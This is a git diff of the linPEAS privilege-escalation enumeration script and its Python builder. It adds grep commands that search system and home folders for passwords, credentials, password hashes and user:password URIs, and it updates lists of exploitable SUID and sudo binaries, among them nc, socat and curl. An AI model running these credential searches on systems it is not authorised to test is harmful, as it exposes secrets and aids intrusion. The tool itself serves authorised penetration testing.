"($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" - echo "" - - ##-- IF) Find possible conf files with passwords - print_2title "Finding possible password in config files" - ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null) - printf "%s\n" "$ppicf" | while read f; do - if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then - echo "$ITALIC $f$NC" - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" - fi - done - echo "" - - ##-- IF) Find possible files with usernames - print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - echo "" - - ##-- IF) Specific hashes inside files - print_2title "Searching specific hashes inside files - less false positives (limit 70)" - regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*' - regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}' - regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}' - regexwp='\$P\$[a-zA-Z0-9_/\.]{31}' - regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}' - regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' - regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' - regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," - echo "" - fi - - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Specific hashes inside files - print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)" - regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' - regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' - regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' - regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," - echo "" - fi - - if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then - ##-- IF) Find URIs with user:password@hoststrings - print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - echo "" - fi -fi diff --git a/linPEAS/builder/src/fileRecord.py b/linPEAS/builder/src/fileRecord.py index 3388faf..b06561a 100644 --- a/linPEAS/builder/src/fileRecord.py +++ b/linPEAS/builder/src/fileRecord.py @@ -4,6 +4,7 @@ class FileRecord: def __init__(self, regex: str, bad_regex: str=DEFAULTS["bad_regex"], + very_bad_regex: str=DEFAULTS["very_bad_regex"], check_extra_path: str =DEFAULTS["check_extra_path"], files: dict={}, good_regex: str=DEFAULTS["good_regex"], @@ -19,6 +20,7 @@ class FileRecord: self.regex = regex self.bad_regex = bad_regex + self.very_bad_regex = very_bad_regex self.check_extra_path = check_extra_path self.files = [FileRecord(regex=fr["name"],**fr["value"]) for fr in files] self.good_regex = good_regex diff --git a/linPEAS/builder/src/linpeasBaseBuilder.py b/linPEAS/builder/src/linpeasBaseBuilder.py new file mode 100644 index 0000000..ec58a1e --- /dev/null +++ b/linPEAS/builder/src/linpeasBaseBuilder.py @@ -0,0 +1,37 @@ +from .yamlGlobals import ( + LINPEAS_PARTS, + LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, + PEAS_CHECKS_MARKUP +) + +class LinpeasBaseBuilder: + def __init__(self): + with open(LINPEAS_BASE_PATH, 'r') as file: + self.linpeas_base = file.read() + + def build(self): + print("[+] Building temporary linpeas_base.sh...") + checks = [] + for part in LINPEAS_PARTS: + name = part["name"] + assert name, f"Name not found in {part}" + name_check = part["name_check"] + assert name_check, f"Name not found in {name_check}" + file_path = part["file_path"] + assert file_path, f"Name not found in {file_path}" + + with open(file_path, 'r') as file: + linpeas_part = file.read() + + checks.append(name_check) + self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check}; then\n" + self.linpeas_base += f'print_title "{name}"\n' + self.linpeas_base += linpeas_part + self.linpeas_base += f"\nfi\necho ''\necho ''\n" + self.linpeas_base += 'if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi\n' + + self.linpeas_base = self.linpeas_base.replace(PEAS_CHECKS_MARKUP, ",".join(checks)) + + with open(TEMPORARY_LINPEAS_BASE_PATH, "w") as f: + f.write(self.linpeas_base) diff --git a/linPEAS/builder/src/linpeasBuilder.py b/linPEAS/builder/src/linpeasBuilder.py index 7880e48..8651e4a 100644 --- a/linPEAS/builder/src/linpeasBuilder.py +++ b/linPEAS/builder/src/linpeasBuilder.py @@ -1,12 +1,13 @@ import re import requests import base64 +import os from .peasLoaded import PEASLoaded from .peassRecord import PEASRecord from .fileRecord import FileRecord from .yamlGlobals import ( - LINPEAS_BASE_PATH, + TEMPORARY_LINPEAS_BASE_PATH, PEAS_FINDS_MARKUP, PEAS_STORAGES_MARKUP, PEAS_STORAGES_MARKUP, @@ -27,7 +28,9 @@ from .yamlGlobals import ( CAP_SETUID_MARKUP, CAP_SETGID_MARKUP, LES_MARKUP, - LES2_MARKUP + LES2_MARKUP, + REGEXES_LOADED, + REGEXES_MARKUP ) @@ -38,7 +41,7 @@ class LinpeasBuilder: self.bash_find_f_vars, self.bash_find_d_vars = set(), set() self.bash_storages = set() self.__get_files_to_search() - with open(LINPEAS_BASE_PATH, 'r') as file: + with open(TEMPORARY_LINPEAS_BASE_PATH, 'r') as file: self.linpeas_sh = file.read() def build(self): @@ -78,6 +81,11 @@ class LinpeasBuilder: self.__replace_mark(EXTRASECTIONS_MARKUP, list(""), "") #Delete extra markup + print("[+] Building regexes searches...") + section = self.__generate_regexes_search() + self.__replace_mark(REGEXES_MARKUP, list(section), "") + + print("[+] Building linux exploit suggesters...") les_b64, les2_b64 = self.__get_linux_exploit_suggesters() assert len(les_b64) > 100 @@ -207,7 +215,8 @@ class LinpeasBuilder: for precord in self.ploaded.peasrecords: if precord.auto_check: - section = f' print_2title "Analyzing {precord.name.replace("_"," ")} Files (limit 70)"\n' + section = f'if [ "$PSTORAGE_{precord.bash_name}" ] || [ "$DEBUG" ]; then\n' + section += f' print_2title "Analyzing {precord.name.replace("_"," ")} Files (limit 70)"\n' for exec_line in precord.exec: if exec_line: @@ -216,6 +225,8 @@ class LinpeasBuilder: for frecord in precord.filerecords: section += " " + self.__construct_file_line(precord, frecord) + "\n" + section += "fi\n" + sections[precord.name] = section return sections @@ -227,7 +238,7 @@ class LinpeasBuilder: analise_line = "" if init: - analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then echo_not_found "'+frecord.regex+'"; fi; ' + analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; ' analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; ' #If just list, just list the file/directory @@ -243,6 +254,7 @@ class LinpeasBuilder: grep_only_bad_lines = f' | grep -E "{frecord.bad_regex}"' if frecord.bad_regex else "" grep_remove_regex = f' | grep -Ev "{frecord.remove_regex}"' if frecord.remove_regex else "" sed_bad_regex = ' | sed -${E} "s,'+frecord.bad_regex+',${SED_RED},g"' if frecord.bad_regex else "" + sed_very_bad_regex = ' | sed -${E} "s,'+frecord.very_bad_regex+',${SED_RED_YELLOW},g"' if frecord.very_bad_regex else "" sed_good_regex = ' | sed -${E} "s,'+frecord.good_regex+',${SED_GOOD},g"' if frecord.good_regex else "" if init: @@ -264,6 +276,9 @@ class LinpeasBuilder: if sed_bad_regex: analise_line += sed_bad_regex + + if sed_very_bad_regex: + analise_line += sed_very_bad_regex if sed_good_regex: analise_line += sed_good_regex @@ -276,8 +291,9 @@ class LinpeasBuilder: for ffrecord in frecord.files: ff_real_regex = ffrecord.regex[1:] if ffrecord.regex.startswith("*") and ffrecord.regex != "*" else ffrecord.regex ff_real_regex = ff_real_regex.replace("*",".*") - analise_line += 'for ff in $(find "$f" -name "'+ffrecord.regex+'"); do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False) - + #analise_line += 'for ff in $(find "$f" -name "'+ffrecord.regex+'"); do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False) + analise_line += 'find "$f" -name "'+ffrecord.regex+'" | while read ff; do ls -ld "$ff" | sed -${E} "s,'+ff_real_regex+',${SED_RED},"; ' + self.__construct_file_line(precord, ffrecord, init=False) + analise_line += 'done; echo "";' return analise_line @@ -305,13 +321,46 @@ class LinpeasBuilder: capsVB.append(b) return (suidVB, sudoVB, capsVB) + + def __generate_regexes_search(self) -> str: + paths_to_search = REGEXES_LOADED["paths"] + regexes = REGEXES_LOADED["regular_expresions"] + + regexes_search_section = "" + + for values in regexes: + section_name = values["name"] + regexes_search_section += f'print_2title "Searching {section_name}"\n' + + for entry in values["regexes"]: + name = entry["name"] + regex = entry["regex"] + regex = regex.replace('"', '\\"').strip() + extra_grep = entry.get("extra_grep") + extra_grep = f"| grep {extra_grep}" if extra_grep else "" + + regexes_search_section += f'print_3title "Searching {name} (limited to 50)"\n' + for path in paths_to_search: + regexes_search_section += "timeout 120 find "+path+" -type f -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} \"s~"+regex+"~${SED_RED}~\" &\n" + + regexes_search_section += "wait\n" + + regexes_search_section += "echo ''\n" + + return regexes_search_section + + def __replace_mark(self, mark: str, find_calls: list, join_char: str): """Substitude the markup with the actual code""" + self.linpeas_sh = self.linpeas_sh.replace(mark, join_char.join(find_calls)) #New line char is't needed def write_linpeas(self, path): """Write on disk the final linpeas""" + with open(path, "w") as f: - f.write(self.linpeas_sh) \ No newline at end of file + f.write(self.linpeas_sh) + + os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file \ No newline at end of file diff --git a/linPEAS/builder/src/yamlGlobals.py b/linPEAS/builder/src/yamlGlobals.py index 8634b9c..095f391 100644 --- a/linPEAS/builder/src/yamlGlobals.py +++ b/linPEAS/builder/src/yamlGlobals.py @@ -2,14 +2,62 @@ import os import yaml CURRENT_DIR = os.path.dirname(os.path.realpath(__file__)) -LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" + +LINPEAS_BASE_PARTS = CURRENT_DIR + "/../linpeas_parts" +LINPEAS_PARTS = [ + { + "name": "System Information", + "name_check": "system_information", + "file_path": LINPEAS_BASE_PARTS + "/1_system_information.sh" + }, + { + "name": "Container", + "name_check": "container", + "file_path": LINPEAS_BASE_PARTS + "/2_container.sh" + }, + { + "name": "Processes, Crons, Timers, Services and Sockets", + "name_check": "procs_crons_timers_srvcs_sockets", + "file_path": LINPEAS_BASE_PARTS + "/3_procs_crons_timers_srvcs_sockets.sh" + }, + { + "name": "Network Information", + "name_check": "network_information", + "file_path": LINPEAS_BASE_PARTS + "/4_network_information.sh" + }, + { + "name": "Users Information", + "name_check": "users_information", + "file_path": LINPEAS_BASE_PARTS + "/5_users_information.sh" + }, + { + "name": "Software Information", + "name_check": "software_information", + "file_path": LINPEAS_BASE_PARTS + "/6_software_information.sh" + }, + { + "name": "Interesting Files", + "name_check": "interesting_files", + "file_path": LINPEAS_BASE_PARTS + "/7_interesting_files.sh" + } +] + + +LINPEAS_BASE_PATH = LINPEAS_BASE_PARTS + "/linpeas_base.sh" +TEMPORARY_LINPEAS_BASE_PATH = CURRENT_DIR + "/../linpeas_base.sh" FINAL_LINPEAS_PATH = CURRENT_DIR + "/../../" + "linpeas.sh" YAML_NAME = "sensitive_files.yaml" +YAML_REGEXES = "regexes.yaml" FILES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_NAME +REGEXES_YAML = CURRENT_DIR + "/../../../build_lists/" + YAML_REGEXES + with open(FILES_YAML, 'r') as file: YAML_LOADED = yaml.load(file, Loader=yaml.FullLoader) +with open(REGEXES_YAML, 'r') as file: + REGEXES_LOADED = yaml.load(file, Loader=yaml.FullLoader) + ROOT_FOLDER = YAML_LOADED["root_folders"] DEFAULTS = YAML_LOADED["defaults"] COMMON_FILE_FOLDERS = YAML_LOADED["common_file_folders"] @@ -18,10 +66,12 @@ assert all(f in ROOT_FOLDER for f in COMMON_FILE_FOLDERS) assert all(f in ROOT_FOLDER for f in COMMON_DIR_FOLDERS) +PEAS_CHECKS_MARKUP = YAML_LOADED["peas_checks"] PEAS_FINDS_MARKUP = YAML_LOADED["peas_finds_markup"] FIND_LINE_MARKUP = YAML_LOADED["find_line_markup"] FIND_TEMPLATE = YAML_LOADED["find_template"] +REGEXES_MARKUP = YAML_LOADED["peas_regexes_markup"] PEAS_STORAGES_MARKUP = YAML_LOADED["peas_storages_markup"] STORAGE_LINE_MARKUP = YAML_LOADED["storage_line_markup"] STORAGE_LINE_EXTRA_MARKUP = YAML_LOADED["storage_line_extra_markup"] diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index 56bdd0c..5f01db3 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -52,16 +52,16 @@ ITALIC="${C}[3m" if uname 2>/dev/null | grep -q 'Darwin' || /usr/bin/uname 2>/dev/null | grep -q 'Darwin'; then MACPEAS="1"; else MACPEAS=""; fi FAST="1" #By default stealth/fast mode SUPERFAST="" -NOTEXPORT="" DISCOVERY="" PORTS="" QUIET="" -CHECKS="SysI,Container,Devs,AvaSof,ProCronSrvcsTmrsSocks,Net,UsrI,SofI,IntFiles" +CHECKS="system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files" WAIT="" PASSWORD="" NOCOLOR="" -VERBOSE="" +DEBUG="" AUTO_NETWORK_SCAN="" +EXTRA_CHECKS="" THREADS="$( ( (grep -c processor /proc/cpuinfo 2>/dev/null) || ( (command -v lscpu >/dev/null 2>&1) && (lscpu | grep '^CPU(s):' | awk '{print $2}')) || echo -n 2) | tr -d "\n")" [ -z "$THREADS" ] && THREADS="2" #If THREADS is empty, put number 2 [ -n "$THREADS" ] && THREADS="2" #If THREADS is null, put number 2 @@ -70,14 +70,14 @@ HELP=$GREEN"Enumerate and search Privilege Escalation vectors. ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, processes and file permissions, special file permissions, readable/writable files, bruteforce other users(top1000pwds), passwords...)$NC inside the host and highlight possible misconfigurations with colors. ${YELLOW}-h${BLUE} To show this message ${YELLOW}-q${BLUE} Do not show banner - ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-e${BLUE} Perform extra enumeration ${YELLOW}-s${BLUE} SuperFast (don't check some time consuming checks) - Stealth mode - ${YELLOW}-w${BLUE} Wait execution between big blocks - ${YELLOW}-n${BLUE} Do not export env variables related with history and do not check Internet connectivity + ${YELLOW}-a${BLUE} All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly + ${YELLOW}-w${BLUE} Wait execution between big blocks of checks ${YELLOW}-N${BLUE} Do not use colours - ${YELLOW}-v${BLUE} Verbose execution + ${YELLOW}-D${BLUE} Debug mode ${YELLOW}-P${BLUE} Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - ${YELLOW}-o${BLUE} Only execute selected checks (SysI, Container, Devs, AvaSof, ProCronSrvcsTmrsSocks, Net, UsrI, SofI, IntFiles). Select a comma separated list. + ${YELLOW}-o${BLUE} Only execute selected checks (system_information,container,procs_crons_timers_srvcs_sockets,network_information,users_information,software_information,interesting_files). Select a comma separated list. ${YELLOW}-L${BLUE} Force linpeas execution. ${YELLOW}-M${BLUE} Force macpeas execution. ${YELLOW}-d ${BLUE} Discover hosts using fping or ping.$DG Ex: -d 192.168.0.1/24 @@ -86,12 +86,11 @@ ${NC}This tool enum and search possible misconfigurations$DG (known vulns, user, ${YELLOW}-t${BLUE} Automatic network scan (host discovery and port scanning) - This option writes to files $GREEN Notice${BLUE} that if you select some network action, no PE check will be performed$NC" -while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do +while getopts "h?asd:p:i:P:qo:LMwNDte" opt; do case "$opt" in h|\?) printf "%s\n\n" "$HELP$NC"; exit 0;; - a) FAST="";; + a) FAST="";EXTRA_CHECKS="1";; s) SUPERFAST=1;; - n) NOTEXPORT=1;; d) DISCOVERY=$OPTARG;; p) PORTS=$OPTARG;; i) IP=$OPTARG;; @@ -102,8 +101,9 @@ while getopts "h?asnd:p:i:P:qo:LMwNvt" opt; do M) MACPEAS="1";; w) WAIT=1;; N) NOCOLOR="1";; - v) VERBOSE="1";; + D) DEBUG="1";; t) AUTO_NETWORK_SCAN="1";; + e) EXTRA_CHECKS="1";; esac done @@ -213,7 +213,7 @@ print_banner(){ } -print_support (){ +print_support () { printf """ ${GREEN}/---------------------------------------------------------------------------\\ | ${BLUE}Do you like PEASS?${GREEN} | @@ -365,8 +365,8 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$|/msguniq$' -sidVB2='/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' +sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/genisoimage$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' +sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perf$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" @@ -511,7 